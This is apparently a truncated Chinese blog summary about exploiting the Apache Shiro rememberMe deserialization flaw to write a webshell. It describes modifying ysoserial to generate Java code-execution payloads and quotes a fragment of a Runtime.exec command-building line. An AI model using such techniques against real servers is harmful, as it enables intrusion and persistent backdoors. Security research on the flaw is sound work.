摘要：Shiro rememberMe 反序列化漏洞写Webshell 修改ysoserial使其支持生成java代码执行Payload 原来的代码 String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\ 阅读全文